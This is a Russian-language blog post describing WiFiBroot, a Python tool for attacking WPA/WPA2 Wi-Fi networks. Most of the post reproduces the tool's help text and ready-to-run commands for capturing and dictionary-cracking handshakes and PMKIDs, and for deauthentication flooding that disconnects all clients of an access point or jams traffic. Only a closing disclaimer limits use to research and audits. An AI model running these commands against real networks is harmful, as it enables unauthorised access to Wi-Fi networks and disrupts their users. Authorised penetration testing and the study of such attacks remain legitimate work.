⚙ WiFiBroot — инструмент для взлома пентеста WiFi для WPA / WPA2 (рукопожатие, PMKID, взлом, EAPOL, деаутентификация) — Information Security Squad
⚙ WiFiBroot — инструмент для взлома пентеста WiFi для WPA / WPA2 (рукопожатие, PMKID, взлом, EAPOL, деаутентификация)

WiFiBroot создан для предоставления клиентам универсального средства для взлома сетей WiFi (WPA / WPA2).

Он сильно зависит от Scapy, хорошо оснащенной библиотеки для работы с пакетами в Python.

Почти каждый процесс в некотором роде зависит от уровней scapy и других функций, за исключением работы беспроводного интерфейса на другом канале.

Это будет сделано с помощью встроенной команды linux iwconfig, для которой вам могут потребоваться привилегии sudo.

В настоящее время он предоставляет четыре независимых режима работы для работы с целевыми сетями.

Два из них являются методами онлайн-взлома, а другой работает в автономном режиме.

Автономный режим предназначен для взлома сохраненных хэшей из первых двух режимов.

Один из них предназначен для атаки деаутентификации в беспроводной сети и может также использоваться в качестве обработчика помех.

Он может быть запущен на различных платформах Linux, и, по крайней мере, для правильной работы требуется WN727N из tp-link.

Установка:

WiFiBroot сильно зависит от scapy.

Итак, вам нужно установить Scapy.

Почти каждая другая библиотека, вероятно, будет установлена ​​в вашей системе.

Убедитесь, что версия, которую вы устанавливаете для scapy, должна быть <= 2.4.0.

Более новые версии могут выдавать некоторые неизвестные ошибки.

$ sudo pip install scapy==2.4.0

Предполагается, что скрипт запускается под sudo, но он все равно будет работать, даже если он не запущен в режиме root. Основные необходимые аргументы:

Документация :

WiFiBroot использует режимы, чтобы определить, какую атаку вы хотите выполнить на вашу цель.

В настоящее время доступно три режима.

Использование каждого режима можно увидеть, указав опцию -help / -h сразу после опции -m / -mode.

Вот список доступных режимов и что они делают:

Syntax:
$ python wifibroot.py [—mode [modes]] [—options]
$ python wifibroot.py —mode 2 -i wlan1mon —verbose -d /path/to/list -w pmkid.txt

Modes:
#     Description                                 Value
01    Capture 4-way handshake and crack MIC code    1
02    Captures and Crack PMKID (PMKID Attack)       2
03    Perform Manual cracking on available
capture types. See —list-types               3
04    Deauthentication. Disconnect two stations
and jam the traffic.                          4

Use -h, —help after -m, —mode to get help on modes.

Каждый режим имеет определенное назначение и имеет свои параметры:

Рукопожатие:

Mode: 
   01      Capture 4-way handshake and crack MIC code    1

Options:
   Args               Description                      Required
   -h, --help         Show this help manual              NO
   -i, --interface    Monitor Interface to use           YES
   -v, --verbose      Turn off Verbose mode.             NO
   -t, --timeout      Time Delay between two deauth
                      requests.                          NO
   -d, --dictionary   Dictionary for Cracking            YES
   -w, --write        Write Captured handshake to
                      a seperate file                    NO
       --deauth       Number of Deauthentication
                      frames to send                     NO 

Filters: 
   -e, --essid         ESSID of listening network
   -b, --bssid         BSSID of target network   .
   -c, --channel       Channel interface should be listening
                       on. Default: ALL

PMKID атака

Mode: 
   02      Captures and Crack PMKID (PMKID Attack)       1

Options:
   Args               Description                      Required
   -h, --help         Show this help manual              NO
   -i, --interface    Monitor Interface to use           YES
   -v, --verbose      Turn off Verbose mode.             NO
   -d, --dictionary   Dictionary for Cracking            YES
   -w, --write        Write Captured handshake to
                      a seperate file                    NO

Filters: 
   -e, --essid         ESSID of listening network
   -b, --bssid         BSSID of target network.
   -c, --channel       Channel interface should be listening
                       on. Default: ALL

Оффлайн взлом

Mode: 
   03    Perform Manaul cracking on available capture
         types. See --list-types                         3

Options:
   Args               Description                      Required 
   -h, --help         Show this help manual              NO
       --list-types   List available cracking types      NO
       --type         Type of capture to crack           YES
   -v, --verbose      Turn off Verbose mode.             NO
   -d, --dictionary   Dictionary for Cracking            YES
   -e, --essid        ESSID of target network. 
                      Only for HANDSHAKE Type            YES
   -r, --read         Captured file to crack             YES
АТАКА ДЭАУТЕНТИКАЦИИ (Стресс-тестирование)
Mode:
    04   Deauthentication. Disconnect two stations
         and jam the traffic.                            4

Options:
    Args              Description                      Required
    -h, --help        Show this help manual              NO
    -i, --interface   Monitor Mode Interface to use      YES
    -0, --count       Number of Deauthentication
                      frames to send. '0' specifies
                      unlimited frames                   YES
        --ap          Access Point MAC Address           NO
        --client      STA (Station) MAC Address          NO

Примеры

Для захвата четырехстороннего рукопожатия и взлома кода MIC:

$ python wifibroot.py —mode 1 -i wlan1mon —verbose -d dicts/list.txt -w output.cap

Чтобы захватить и взломать PMKID:

$ python wifibroot.py —mode 2 -i wlan1mon —verbose -d dicts/list.txt -w output.txt

Автономное рукопожатие и PMKID:
$ python wifibroot.py —mode 3 —type handshake —essid «TARGET ESSID» —verbose -d dicts/list.txt —read output.cap
$ python wifibroot.py —mode 3 —type pmkid —verbose -d dicts/list.txt —read output.txt
Атака аутентификации в различной форме:
# Ultimate Deauthentication attack:
$ python wifibroot.py —mode 4 -i wlan1mon -00 —verbose
# Disconnect All Clients from Acess Point:
$ python wifibroot.py —mode 4 -i wlan1mon —ap [AP MAC] —verbose
# Disconnect a Specific Client:
$ python wifibroot.py —mode 4 -i wlan1mon —ap [AP MAC] —client [STA MAC] —verbose

¯\_(ツ)_/¯

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

5e7fa976b0640d40